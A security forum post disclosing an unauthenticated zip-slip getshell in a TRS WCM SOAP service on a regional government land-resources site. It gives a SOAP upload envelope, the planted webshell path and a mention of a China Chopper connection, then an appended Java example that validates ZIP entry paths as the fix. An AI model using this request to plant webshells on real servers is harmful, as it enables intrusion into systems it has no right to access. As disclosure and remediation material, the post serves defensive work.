HanDs
Administrator

[July vulnerability disclosure] Inner Mongolia Department of Land and Resources getshell



A while ago I read applychen's vulnerability analysis...

Then I tried it out on the web...

And then I found that the Inner Mongolia Department of Land and Resources has this vulnerability...

Details:

Vulnerable location: http://*.*.*.*/wcm/services/trswcm:SOAPService

The problem is in the public String importDocuments(byte _pImportFileContent[], String _sFileExt) method of SOAPServiceImpl.java: when _sFileExt is zip, it calls importFromZip():

See applychen's analysis for details: http://**.**.**.**/bugs/wooyun-2010-0162315

GETSHELL is possible directly, without logging in...

To build the WebShell, follow applychen's steps one by one, [email protected]

The specific payload is constructed as follows:

Code:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/"  xmlns:xsd="http://**.**.**.**/1999/XMLSchema"  xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance"  xmlns:m0="http://**.**.**.**/"  xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/wcm/services/trswcm:SOAPService">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<importDocuments> <in0>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</in0>
<in1>.zip</in1>
</importDocuments>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>



Once it is constructed, remember to add a header and upload it directly.

On success, the webshell path is: http://*.*.*.*/webpic/help.jspx

Proof of vulnerability:

1. Screenshot of the vulnerable location: 5.jpg

2. Screenshot of the constructed payload: 2.jpg

3. Screenshot after the upload completed: 3.jpg

4. Screenshot of the China Chopper (菜刀) connection: 6.jpg





Fix:

Validate that the file paths inside the ZIP are legitimate.


Inner Mongolia
#1
Posted: 2016-7-9   |   Views: 0   |   Replies: 0
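The post's fix recommendation ("validate that the file paths inside the ZIP are legitimate") is the zip-slip check that importFromZip() lacked: an archive entry name is joined to the import directory without being checked, so a name containing ".." can place a file anywhere the process can write. The following is an added example of what that validation looks like in Java; it is not TRS WCM's code, and the class name SafeZipImport, the method names and the extension allow-list are assumptions made for the illustration. It resolves each entry against the import directory, rejects anything that normalizes to a path outside it, and additionally refuses file types a document import has no reason to contain.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/**
 * Added example (not TRS WCM's importFromZip): extract a ZIP into an import
 * directory while refusing any entry whose path would escape that directory.
 */
public class SafeZipImport {

    /** Thrown when an entry would land outside the import directory or is of a disallowed type. */
    public static class UnsafeEntryException extends IOException {
        public UnsafeEntryException(String msg) { super(msg); }
    }

    /**
     * Resolve an entry name against importDir and verify the normalized result
     * still lies under importDir. Names containing ".." segments or absolute
     * paths normalize to somewhere else and are rejected before any write.
     */
    static Path resolveEntry(Path importDir, String entryName) throws IOException {
        Path base = importDir.toAbsolutePath().normalize();
        Path target = base.resolve(entryName).normalize();
        if (!target.startsWith(base)) {
            throw new UnsafeEntryException("zip entry escapes import directory: " + entryName);
        }
        return target;
    }

    /** Allow-list on extension: a document import should never write server-side script files. */
    static boolean hasAllowedExtension(String entryName, List<String> allowed) {
        String lower = entryName.toLowerCase();
        for (String ext : allowed) {
            if (lower.endsWith(ext)) return true;
        }
        return false;
    }

    /** Extract zipBytes into importDir; returns the files written. */
    public static List<Path> importFromZip(InputStream zipBytes, Path importDir,
                                           List<String> allowedExt) throws IOException {
        List<Path> written = new ArrayList<>();
        try (ZipInputStream zis = new ZipInputStream(zipBytes)) {
            ZipEntry entry;
            while ((entry = zis.getNextEntry()) != null) {
                String name = entry.getName();
                Path target = resolveEntry(importDir, name);   // traversal check happens here
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                    continue;
                }
                if (!hasAllowedExtension(name, allowedExt)) {
                    throw new UnsafeEntryException("disallowed file type in import: " + name);
                }
                Files.createDirectories(target.getParent());
                Files.copy(zis, target, StandardCopyOption.REPLACE_EXISTING);
                written.add(target);
                zis.closeEntry();
            }
        }
        return written;
    }

    public static void main(String[] args) throws IOException {
        Path importDir = Files.createTempDirectory("wcm-import");
        List<String> allowed = List.of(".xml", ".txt");

        // Constructed sample archive: one benign entry, then one that tries to climb out of importDir.
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(buf)) {
            zos.putNextEntry(new ZipEntry("docs/article.xml"));
            zos.write("<doc/>".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
            zos.putNextEntry(new ZipEntry("../escaped.txt"));
            zos.write("x".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }

        try {
            importFromZip(new ByteArrayInputStream(buf.toByteArray()), importDir, allowed);
            System.out.println("unexpected: import accepted");
        } catch (UnsafeEntryException e) {
            System.out.println("rejected: " + e.getMessage());   // the "../escaped.txt" entry is refused
        }
    }
}
```

The check is done on the normalized absolute path rather than by searching the entry name for "..", so encodings such as "a/../../x" or an absolute entry name are caught the same way. Because ZipInputStream is read once, the example rejects the archive at the first bad entry after earlier entries have already been written; a production importer would read the archive twice (validate every name first, then extract) or extract into a staging directory and move the result only after all entries pass.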